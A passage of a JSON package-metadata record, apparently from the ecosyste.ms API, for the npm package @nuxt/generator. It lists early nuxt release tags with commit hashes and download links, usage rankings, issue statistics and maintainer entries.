xt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:10.716Z","dependent_packages_count":11,"downloads":574073,"downloads_period":"last-month","dependent_repos_count":56768,"rankings":{"downloads":0.2464289785689697,"dependent_repos_count":0.12640759039347127,"dependent_packages_count":1.908441654154638,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.43739883261343837,"average":0.5655385423485929},"purl":"pkg:npm/%40nuxt/generator","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/generator","docker_dependents_count":252,"docker_downloads_count":1373618,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/generator","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/generator/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:16.253Z","updated_at":"2022-11-20T01:59:16.253Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:15.982Z","updated_at":"2022-11-20T01:59:15.982Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:16.122Z","updated_at":"2022-11-20T01:59:16.122Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:16.610Z","updated_at":"2022-11-20T01:59:16.610Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:05.765Z","updated_at":"2023-08-19T18:27:05.765Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosys